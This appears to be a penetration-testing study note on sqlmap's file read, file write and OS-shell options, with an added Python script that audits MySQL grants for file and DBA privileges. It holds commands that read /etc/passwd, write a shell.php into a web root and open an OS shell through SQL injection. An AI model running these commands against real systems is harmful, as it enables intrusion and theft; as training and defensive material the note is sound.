File Read
To read files, the DB user must have the privilege to LOAD DATA and INSERT.
Most likely, we will need DBA privileges to read data.
To check for DBA privilege, we use the --is-dba switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
...SNIP...
current user is DBA: True
[*] ending @ 17:31:56 /2020-11-19
We can read files using the --file-read option:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
File Write
Most of the time, we won’t be able to write a file.
We need DBA privileges to be able to write files.
We can write files like this:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
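Both the file read and file write sections above depend on the database account's privileges, so a defender can audit that web-application accounts do not hold them. The following is an added example, not part of the original notes and not sqlmap code; it assumes a MySQL backend, parses constructed SHOW GRANTS output, and the account names, the audit helper, and the choice to treat SUPER / ALL PRIVILEGES as DBA-level are assumptions.

```python
import re

# MySQL semantics (assumed backend): FILE gates server-side file access
# (LOAD DATA INFILE, LOAD_FILE(), SELECT ... INTO OUTFILE).
FILE_PRIVS = {"FILE", "ALL PRIVILEGES"}
DBA_PRIVS = {"SUPER", "ALL PRIVILEGES"}  # assumption: treated as DBA-level

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<account>\S+)",
    re.IGNORECASE,
)

def parse_grant(line):
    """Return (account, scope, set_of_privileges) or None for non-GRANT lines."""
    m = GRANT_RE.match(line.strip())
    if not m:
        return None
    # Drop column lists such as "SELECT (id, name)" before splitting on commas.
    privs = re.sub(r"\([^)]*\)", "", m.group("privs"))
    names = {p.strip().upper() for p in privs.split(",") if p.strip()}
    account = m.group("account").replace("`", "").replace("'", "")
    scope = m.group("scope").replace("`", "")
    return account, scope, names

def audit(grant_lines, app_accounts):
    """Flag web-application accounts holding global file or DBA privileges."""
    findings = []
    for parsed in filter(None, map(parse_grant, grant_lines)):
        account, scope, privs = parsed
        # Only global (*.*) grants on accounts used by web apps are of interest.
        if account not in app_accounts or scope != "*.*":
            continue
        if privs & FILE_PRIVS:
            findings.append((account, "file-access"))
        if privs & DBA_PRIVS:
            findings.append((account, "dba"))
    return findings

# Constructed sample: SHOW GRANTS output collected for four accounts.
SAMPLE = [
    "GRANT SELECT, INSERT, FILE ON *.* TO `webapp`@`%`",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO `shopfront`@`10.0.0.5`",
    "GRANT ALL PRIVILEGES ON *.* TO `legacy`@`localhost` WITH GRANT OPTION",
    "GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION",
]
APP_ACCOUNTS = {"webapp@%", "shopfront@10.0.0.5", "legacy@localhost"}

if __name__ == "__main__":
    for account, issue in audit(SAMPLE, APP_ACCOUNTS):
        print(f"{account}: {issue}")
```

An account that only has table-level privileges on its own schema, like the constructed shopfront entry, produces no finding.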
OS Command Execution
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shell
If we know the type of SQL injection, we can specify it using the --technique switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E